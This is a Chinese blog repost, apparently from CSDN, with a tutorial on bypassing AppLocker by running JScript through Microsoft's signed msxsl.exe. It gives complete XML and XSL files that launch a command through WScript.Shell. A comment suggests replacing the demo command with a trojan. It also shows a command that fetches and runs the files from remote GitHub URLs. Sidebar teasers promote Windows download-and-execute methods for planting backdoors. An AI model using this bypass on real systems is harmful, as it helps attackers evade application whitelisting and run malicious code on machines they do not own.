利用MSXSL.exe绕过AppLocker应用程序控制策略

最新推荐文章于 2024-04-02 17:24:25 发布
最新推荐文章于 2024-04-02 17:24:25 发布
阅读量223 收藏
点赞数
原文链接:http://www.cnblogs.com/backlion/p/7348506.html
版权

1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为:

https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714

2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:

msxsl.exe test.xml exec.xsl

test.xml:

<?xml version="1.0"?>

<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>

<customers>

<customer>

<name>Microsoft</name>

</customer>

</customers>

 

exec.xsl

<?xml version='1.0'?>

<xsl:stylesheet version="1.0"

xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

xmlns:msxsl="urn:schemas-microsoft-com:xslt"

xmlns:user="http://mycompany.com/mynamespace">

 

<msxsl:script language="JScript" implements-prefix="user">

   function xml(nodelist) {

var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");

//这里可以改造为执行你的木马文件如:

// var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & shell.exe");

   return nodelist.nextNode().xml;

 

   }

</msxsl:script>

<xsl:template match="/">

   <xsl:value-of select="user:xml(.)"/>

</xsl:template>

</xsl:stylesheet>

  

3.最终执行结果为:

 

 

4.也可以远程执行:

msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml  https://raw.githubusercontent.com/backlion/demo/master/exec.xsl

 

转载于:https://www.cnblogs.com/backlion/p/7348506.html

weixin_30839881
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过命令下载执行恶意代码的几种姿势
08-20 2万+
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。在目标主机执行恶意代码,可以分为上传/下载并执行恶意代...
MSXML读取XML文件
Garfield的专栏
05-25 943
<br />源代码如下:(环境vs2005)希望对不熟悉的人有所帮助<br /> <br />#include <windows.h><br /> #include <msxml.h><br /> #import "msxml.dll" rename_namespace("xml") <br /> <br />int _tmain(int argc, _TCHAR* argv[])<br /> {<br />     CoInitialize(NULL) ;  <br />     xml::IX
应急响应实战笔记——权限维持篇:⑤ Windows命令行文件下载方式汇总
最新发布
君逍遥o
04-02 1449
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个 bash脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。第一种,远程下载文件到本地,然后再执行;*本文收集了15种常见的文件下载执行的方式,并结合具体案例**,让我们一起来看看是怎么实现的吧。
如何利用msxsl绕过AppLocker
weixin_34235457的博客
09-13 273
本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代码,从而实现对Applocker绕过。 如图 twitter地址如下: https://twitter.com/subTee/status/87761...
Windows&Linux文件传输方式总结
st3pby的博客
06-18 1万+
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件传输方式。Windows在本地或者VPS上搭建FTP服务器,通过简单的FTP命令即可实现文件的上传。常用的FTP命令: 例如,我们可以通过在攻击主机上搭建FTP服务,之后在目标主机上通过cmd下的ftp进行远程连接: 首先,在
docx到html的基本转换
03-05
在这个场景中,我们可以使用msxsl.exe结合一个XSL样式表(如`mdocx.xsl`)来转换`Document.xml`。 3. **XSLT转换**:`mdocx.xsl`文件就是一个XSL样式表,它定义了如何将.docx文件中的XML元素映射到HTML标签。XSLT...
利用MSXML解析XML文档
06-18
XML 文档中的基本单元,如元素、属性、文本、注释等。每个节点都有自己的属性和方法,可以用来访问或修改节点的内容和结构。...通过掌握 MSXML 和 XML 相关知识,开发者能够更高效地处理和利用 XML 数据。
源码 Dr.Bob’s - XML, SOAP & Web Services Development January 2012
04-19
MSXSL ................................................................................... 32 Some examples of XSLT.................................................... 32 Default XSLT Templates ..........
Windows文件下载执行的15种姿势1
08-03
例如,可以使用`Invoke-WebRequest`或`WebClient`类下载文件到本地,然后通过`-ExecutionPolicy Bypass`绕过执行策略执行文件。 2. **Bitsadmin**: Bitsadmin是Windows自带的命令行工具,用于管理下载和上传任务...
XML processing
05-02
Xml processing engine
Windows文件下载执行的15种姿势
04-15 2万+
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一...
XSLT 编译器 (xsltc.exe)
weixin_34409822的博客
05-24 154
具体请参考 : http://msdn.microsoft.com/zh-cn/library/bb399405.aspx XSLT 编译器 (xsltc.exe) 编译 XSLT 样式表并生成一个程序集。 然后可以将已编译的样式表直接传递到 XslCompiledTransform.Load(Type) 方法中。 xsltc.exe 工具包括在 Visual Studio 2008 中。有关...
安装Microsoft Office 2010 提示需要安装MSXML版本6.10.1129.0 的解决
c_lanxiaofang的博客
05-22 16万+
打开连接:https://www.microsoft.com/zh-cn/download/details.aspx?id=6276对于上面三个选择下载哪个的判断可以参考博客:https://blog.csdn.net/c_lanxiaofang/article/details/80410925:msxml6_x86.msi和msxml6_ia64.msi和msxml6_x64.msi的选择我选 ...
office2010安装需MSXML版本6.10.1129.0详解解决方案
热门推荐
常钛
09-04 16万+
office2010安装提示报错 由于下列原因,安装程序无法继续,需要计算机安装MSXML版本6.10.1129.0 桌面“计算机”图标右键单击→“属性”(从这里了解自己电脑是64位操作系统还是32位)    下载MSXML 6.10.1129.0  32位与64位,建议都可以下载安装一下 官方下载地址:http://www.microsoft.com/zh-cn/download/d...
windows 弹shell_Windows文件下载执行的15种姿势
weixin_39706127的博客
11-19 299
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一种,远程下载文件到本地,然后再执行;第二种,远程下载执行,执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。另外呢,只要你所在服务器的环境支持,你也可以通过任何一门语言来实现它,这种...
"Windows文件下载执行技巧:15种方式揭秘
这些方式包括PowerShell、Bitsadmin、certutil、wget、ipc$文件共享、FTP、TFTP、WinScp、msiexec、IEExec、mshta、rundll32、regsvr32、MSXSL.EXE、pubprn.vbs等方式。 PowerShell是一种常用的命令行外壳程序和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值